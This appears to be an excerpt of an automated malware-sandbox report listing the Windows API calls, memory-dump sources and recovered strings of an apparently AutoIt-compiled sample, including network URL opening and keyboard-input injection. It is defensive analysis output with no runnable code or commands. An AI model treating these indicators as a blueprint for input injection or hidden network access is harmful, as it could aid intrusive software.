                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00FF28D1
                                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00FF28EA
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FF28FA
                                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00FF2912
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FF2933
                                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00FF2942
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FF295F
                                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00FF296E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102CBC7
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0102CBDA
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 0102CBEE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102CCB7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: GetLastError.KERNEL32 ref: 0102CD67
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: SetEvent.KERNEL32(?), ref: 0102CD7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: InternetCloseHandle.WININET(00000000), ref: 0102CD86
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetWindowThreadProcessId.USER32(?,00000000), ref: 010143AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetCurrentThreadId.KERNEL32 ref: 010143B4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,01012F00), ref: 010143BB
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 01012F0A
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 01012F28
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 01012F2C
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 01012F36
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01012F4E
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01012F52
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 01012F5C
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01012F70
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01012F74
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 010443C1
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 010443D6
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010443F0
• _wcslen.LIBCMT ref: 01044435
• SendMessageW.USER32(?,00001057,00000000,?), ref: 01044462
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 01044490
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101C6C4
• IsMenu.USER32(00000000), ref: 0101C6E4
• CreatePopupMenu.USER32 ref: 0101C71A
• GetMenuItemCount.USER32(018E5C60), ref: 0101C76B
• InsertMenuItemW.USER32(018E5C60,?,00000001,00000030), ref: 0101C793
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 0101D1BE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 00FCFC41
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 0100FC15
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 0100FC98
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 010437B7
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 010437BF
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010437CA
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 010437D6
                                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01043812
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01043823
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01046504,?,?,000000FF,00000000,?,000000FF,?), ref: 0104385E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0104387D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00FF194E
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF19D1
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00FF1B7B,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF1A64
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF1A7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF1AF7
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FF1B22
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FF1B2E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01021C1B
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021C43
                                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 01021C67
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021C97
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021D1E
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021D83
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021DEF
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 010343C8
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 010344D7
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010344E7
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0103467C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102169E: VariantInit.OLEAUT32(00000000), ref: 010216DE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102169E: VariantCopy.OLEAUT32(?,?), ref: 010216E7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102169E: VariantClear.OLEAUT32(?), ref: 010216F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?,?,01010C4E), ref: 0101091B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010936
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010944
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?), ref: 01010954
                                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 010356AE
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010357B6
                                                                                                                                                                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0103582C
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 01035837
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenu.USER32(?), ref: 01042C1F
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 01042C51
                                                                                                                                                                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01042C79
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01042CAF
                                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 01042CE9
                                                                                                                                                                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 01042CF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetWindowThreadProcessId.USER32(?,00000000), ref: 010143AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetCurrentThreadId.KERNEL32 ref: 010143B4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,01012F00), ref: 010143BB
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 01042D7F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101F292: Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 01048992
                                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0104899E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 01048A79
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 01048AAC
                                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 01048AE4
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 01048B06
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 01048B1E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 0101B8C0
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101B8D5
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0101B936
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0101B964
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0101B983
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0101B9C4
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0101B9E7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(00000000), ref: 0101B6E0
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101B6F5
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0101B756
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0101B782
